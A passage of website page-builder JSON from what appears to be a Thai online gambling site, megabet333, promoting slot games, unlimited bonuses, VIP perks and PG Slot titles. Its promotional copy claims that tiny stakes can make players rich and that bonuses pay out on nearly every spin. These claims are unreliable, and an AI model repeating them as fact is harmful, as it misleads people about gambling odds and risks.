uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 